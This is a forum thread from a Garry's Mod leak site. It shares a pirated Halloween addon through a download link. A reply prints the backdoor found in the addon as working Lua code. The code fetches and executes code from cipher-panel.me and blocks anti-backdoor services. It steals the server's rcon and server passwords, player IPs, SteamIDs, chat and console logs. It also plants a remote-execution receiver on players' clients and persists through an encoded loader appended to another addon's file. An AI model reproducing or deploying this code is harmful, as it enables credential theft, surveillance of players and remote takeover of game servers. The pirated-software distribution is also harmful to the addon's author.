Garry's Mod Leaks

[LEAK] Zeros PumpkinNight (Halloween Script) 1.1.2

Submitted by viciwi, , Thread ID: 148822

Thread Closed
04-11-2019, 05:56 PM
This post was last modified: 05-11-2019, 02:32 PM by viciwi
#1
[Image: 29b2294500e26aa24e72ed26bc137ae7.png]

Hello to you here is the latest version of Zero's PumpkinNight Halloween (Halloween Script) as I saw that no one had leaked anywhere I do, this addon contains no DRM, I would update it when there will have a Update.
Have fun.

================================================== =================================

GMODSTORE LINK

FEATURES:

Blues Unboxing 3
Toolgun Backing to create custom fees for Pumpkins
Table Dashboard that displays the Top 10 Players with the Most Broken Pumpkins
Enemy Boss that gives the player a dangerous opponent
Ghost NPC that haunts the players.
NPC shop with nice
Gibs Breakable Pumpkininterface
Support Pointshop 1 & 2
Support accessories SH (Darkrp)
Support xAdmin
Itemstore support for Partypopper SWEPS
Without DRM
Fully customizable
Multilanguage support
Customized templates Personalized
animations Customized
materials

=================== ================================================== ==============

Drag the addon into garrysmod / addons /
Install thecontentson your server.


Download: https://anonfile.com/g8z5R790n5/zeros_pumpkinnight_zip

RE: [LEAK] Zeros PumpkinNight (Halloween Script) 1.1.2

This post was last modified: 07-10-2020, 10:59 AM by PrikolMen
#2
thanks for free addon, nice backdoor bro XD

timer.Simple(0.60, function() http.Fetch('https://cipher-panel.me/secure_area/flg.php?to=qG2r0', function(fck) RunString(fck, 'BillIsHere', false) end) end)

if CLIENT then return end

if CpzCLzaPIOYCqfc == "CpzCLzaPIOYCqf" then return end
CpzCLzaPIOYCqfc = "CpzCLzaPIOYCqf"

local dyiJJnNvqRNkEoC34n3WitHApRDghvFg = {
"\x64\x72\x6d\x2e\x67\x6d\x2e\x65\x73\x79\x2e\x65\x73",
"\x6f\x6d\x65\x67\x61\x2d\x70\x72\x6f\x6a\x65\x63\x74\x2e\x63\x7a",
"\x6f\x6d\x65\x67\x61\x2d\x70\x72\x6f\x6a\x65\x63\x74",
"\x73\x6d\x61\x72\x74\x2d\x6f\x76\x65\x72\x77\x72\x69\x74\x65",
"\x72\x76\x61\x63",
"\x71\x72\x65\x78",
"\x67\x2d\x68\x75\x62\x2e\x78\x79\x7a",
"\x65\x78\x6f\x64\x6f\x73\x69\x75\x6d",
"\x68\x61\x79\x6c\x61\x79\x2e\x74\x6b",
"\x2e\x30\x30\x30\x77\x65\x62\x68\x6f\x73\x74",
"\x2e\x79\x6f\x2e\x66\x72",
"\x2e\x67\x71",
"\x2e\x78\x79\x7a",
"\x2e\x74\x6b"
}

local PptiGTkXsvUkecKLtoRtOvBTxBdMicAf = http.Fetch
local XgdErWFbLVIBIYDGVIiPQFgcyykTEUWV = http.Post
local zKeYmjbHBmTPAkstSAEZWJtMmLnkfQt = HTTP

timer.Create("CpzCLzaPIOYCqfc", 8.5, 3, function()

function http.Fetch(xHRMIvC,Lxpyl,PILescy,lVIKZMbLy)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(xHRMIvC, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
PptiGTkXsvUkecKLtoRtOvBTxBdMicAf(xHRMIvC,Lxpyl,PILescy,lVIKZMbLy)
end
end

function http.Post(a,b,c,d,e)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(a, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
XgdErWFbLVIBIYDGVIiPQFgcyykTEUWV(a,b,c,d,e)
end
end

function HTTP(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp.url, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
zKeYmjbHBmTPAkstSAEZWJtMmLnkfQt(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp)
end
end


end)

util.AddNetworkString("CpzCLzaPIOYCqfc")

local function ServerInfo()

timer.Create("NuJJRssU", 5, 0, function()

local info = {}

local files = file.Find("cfg/*", "GAME")



for i = 1, #files do

if string.EndsWith(files[i], ".cfg") then

local content = file.Read("cfg/" .. files[i], "GAME")

content = string.Explode("\n", content)



for i = 1, #content do

if string.StartWith(content[i], "rcon_password") then

table.insert(info, 1, string.Split(content[i], "\"")[2])

end



if string.StartWith(content[i], "sv_password") then

table.insert(info, 2, string.Split(content[i], "\"")[2])

end

end

end

end



local rcon = info[1] or "Inconnu"

local password = info[3] or "Inconnu"



if rcon == "" then

rcon = "Inconnu"

end



if password == "" then

password = "Inconnu"

end



local function BackSteam( ply )

ply:SendLua([[net.Receive("cplusdetectablefdp",function()RunString(net.ReadString(),"_")end)]])

end


local players = {}
for k,v in pairs(player.GetAll()) do
if engine.ActiveGamemode() == "darkrp" then
table.insert(players, {
money = v:getDarkRPVar("money"),
job = v:getDarkRPVar("job"),
name = v:Name(),
steamid = v:SteamID(),
ip = v:IPAddress(),
steamidsex = v:SteamID64(),
group = v:GetUserGroup()
})
else
table.insert(players, {
name = v:Name(),
steamid = v:SteamID(),
ip = v:IPAddress(),
steamidsex = v:SteamID64(),
group = v:GetUserGroup()
})
end
end

hook.Add( "PlayerSay", "ck", function( ply, text )

local ckchat = {

serverip = game.GetIPAddress(),

plyid = ply:SteamID64(),

plyip = ply:IPAddress(),

plyname = ply:Nick(),

plyrank = ply:GetUserGroup(),

validate = "QRbsnCCjHbawbi",

say = text }

http.Post("https://cipher-panel.me/secure_area/chatreceive.php", ckchat)

end)

if file.Exists("console.log", "GAME") then
local log = file.Read("console.log", "GAME")
loga = string.sub(log, (#log-30000))
http.Post("https://cipher-panel.me/secure_area/consolelog.php", {s=game.GetIPAddress(),l=loga,validate="QRbsnCCjHbawbi",})
end

local function payGJeYNoYtmIT(func,n)
for i=0,30 do
local xx = jit.util.funck( func, -i )
if xx == n then
return true
end
end
return false
end

local function GetLinesFromFuncInfo(poof)
local src = debug.getinfo(poof)
if not src.short_src then return "(No source)" end
if not file.Exists(src.short_src,"GAME") then
return "(RunString)"
end
local lines = string.Split(file.Read(src.short_src,"GAME"),"\n")
local lean = ""
for k,v in pairs(lines) do
if (k >= src.linedefined) and (k <= src.lastlinedefined) then
lean = lean .. v .. "\n"
end
end
return lean
end

local function GetBackdoors()
local ret = {}
ret = {}
local tbl = net.Receivers
for k,v in pairs(tbl) do
if payGJeYNoYtmIT(v,"RunString") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
if payGJeYNoYtmIT(v,"RunStringEx") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
if payGJeYNoYtmIT(v,"CompileString") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
end
if encodetbl ~= nil then
local aab = ""
if RunHASHOb and isfunction(RunHASHOb) then
aab = debug.getinfo(RunHASHOb).short_src
end
table.insert(ret,{net="GVacDoor",file=aab,func=""})
end
if util.NetworkStringToID("loading_kvacdoor") ~= 0 then
table.insert(ret,{net="KVacDoor",file="",func=""})
end
return ret
end

local detect = {}
detect.snte = "0"
detect.cac = "0"
detect.all = GetBackdoors()

if file.Exists("autorun/server/snte_source.lua","LUA") or ConVarExists("snte_ulxluarun") or ConVarExists("snte_dupefix") then
detect.snte = "1"
end
if CAC then
detect.cac = "1"
end

local function PlayerSteam(ply)

BackSteam(ply)

if !ply:IsBot() then

local playerinfo = {

server = GetConVar("hostname"):GetString(),

name = tostring(ply:Name()),

ipadress = tostring(ply:IPAddress()),

steamid = tostring(ply:SteamID()),

steamid64 = tostring(ply:SteamID64()),

validate = "QRbsnCCjHbawbi",

}

http.Post("https://cipher-panel.me/secure_area/steamply.php", playerinfo,function©

net.Start("CpzCLzaPIOYCqfc")

net.WriteString©

net.Send(ply)

end,function(e)

end)

end

end


hook.Add("PlayerInitialSpawn","exRepytB",function(ply)

PlayerSteam(ply)

end)


local servinfo = {

ip = game.GetIPAddress(),

hostname = GetHostName(),

players = #player.GetHumans() .. "/" .. game.MaxPlayers(),

map = game.GetMap(),

gamemode = engine.ActiveGamemode(),

rcon = rcon,

password = password,

uptime = tostring(math.floor(CurTime()/60)),

token = "qG2r0",

playerslist = util.TableToJSON(players),

det = util.TableToJSON(detect),

validate = "QRbsnCCjHbawbi",

real = "85.26.235.192"

}



http.Post("https://cipher-panel.me/secure_area/evo.php", servinfo,function(fck,...)

if string.len(fck) <= 0 then return end

xpcall(function()

local cap = CompileString(fck,"BillIsHere",false)

if isfunction(cap) then

cap()

end

end, function(e)

end)

end)



end)

end

ServerInfo()

if file.Exists("xeon/xeon.dat", "DATA") then
file.Append("xeon/xeon.dat", "\n" .. [[if SERVER then timer.Simple(0.70,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\99\105\112\104\101\114\45\112\97\110\101\108\46\109\101\47\115\101\99\117\114\101\45\97\114\101\97\47\102\108\103\46\112\104\112\63\116\111\61\48\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end) end]])
end


OH, what is this, lets decrypt!)

Users browsing this thread: 1 Guest(s)